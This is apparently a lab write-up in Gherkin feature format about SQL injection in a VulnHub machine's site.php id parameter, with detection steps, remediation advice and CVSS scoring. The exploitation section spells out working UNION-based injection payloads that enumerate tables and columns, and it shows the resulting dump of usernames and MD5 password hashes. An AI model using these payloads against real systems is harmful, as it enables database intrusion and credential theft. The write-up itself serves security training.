## Version 1.4.1
## language: en

Feature:
  TOE:
    vulnhub
  Location:
    http://192.168.1.76/site.php - id (field)
  CWE:
    CWE-89: Improper Neutralization of Special Elements used in an SQL Command
    ('SQL Injection')
  Rule:
    REQ.173: R173. Discard unsafe inputs
  Goal:
    Get all user's credentials
  Recommendation:
    Sanitize inputs

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.08.01  |
    | Firefox         | 79.0        |
    | VirtualBox      | 6.1         |
  TOE information:
    Given I am accessing the site at 192.168.1.76
    And it runs on virtualbox

  Scenario: Normal use case
    Given I am logged as "mriviere"
    When I go to
    """
    http://192.168.1.76/site.php?id=2
    """
    Then I can see a list of employees [evidence](employees.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can not perform a static detection

  Scenario: Dynamic detection
    Given I change "/site.php?id=1" for "/site.php?id='"
    Then I can see the message
    """
    Sorry, a technical error has occurred.
    """
    When I try
    """
    /site.php?id=-1 or 1=1 -- -
    """
    Then I can see the page shows all three locations instead of just "Rennes"
    """
    Paris (9 bis rue Dupond Eloise, 78000 VERSAILLES)
    Rennes (8 Rue des Lilas, 35000 Rennes)
    Brest (32 rue de Siam, 29200 Brest)
    """
    Then I can conclude that the site is vulnerable to SQL injection

  Scenario: Exploitation
    Given the site is vulnerable to SQLinjection
    Then I try an "UNION" attack
    And I find that the original query uses two columns [evidence](colnum.png)
    """
    /site.php?id=-1 UNION SELECT 1,2-- -
    """
    When I try to get the table names
    """
    /site.php?id=-1 UNION SELECT table_name,2 FROM information_schema.tables-- -
    """
    Then I find some interesting tables [evidence](tables.png)
    """
    ...
    expense (2)
    message (2)
    user (2)
    accounts (2)
    ...
    """
    When I look for user's columns
    """
    /site.php?id=-1 UNION SELECT table_name,column_name FROM
      information_schema.columns WHERE table_name=0x75736572-- -
    """
    Then I can see all the columns [evidence](usercols.png)
    When I inject
    """
    /site.php?id=-1 UNION SELECT username,password FROM user-- -
    """
    Then I can see all user's credentials
    """
    afoulon (124922b5d61dd31177ec83719ef8110a)
    pbaudouin (64202ddd5fdea4cc5c2f856efef36e1a)
    rlefrancois (ef0dafa5f531b54bf1f09592df1cd110)
    mriviere (d0eeb03c6cc5f98a3ca293c1cbf073fc)
    mnguyen (f7111a83d50584e3f91d85c3db710708)
    pgervais (2ba907839d9b2d94be46aa27cec150e5)
    placombe (04d1634c2bfffa62386da699bb79f191)
    triou (6c26031f0e0859a5716a27d2902585c7)
    broy (b2d2e1b2e6f4e3d5fe0ae80898f5db27)
    brenaud (2204079caddd265cedb20d661e35ddc9)
    slamotte (21989af1d818ad73741dfdbef642b28f)
    nthomas (a085d095e552db5d0ea9c455b4e99a30)
    vhoffmann (ba79ca77fe7b216c3e32b37824a20ef3)
    rmasson (ebfc0985501fee33b9ff2f2734011882)
    test (25f9e794323b453885f5181f1b624d0b)
    """
    Then I can conclude that I can exploit the SQL injection

  Scenario: Remediation
    Given I don't have access to the source code
    Then I recommend following OWASP's SQL injection prevention guide
    """
    https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_\
    Cheat_Sheet.html
    """

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.8 (Medium) - AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.5 (Medium) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    6.5 (Medium) - MAV:N/MAC:L/MPR:H/MUI:N/MS:C/MC:H/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date {2020-08-26}
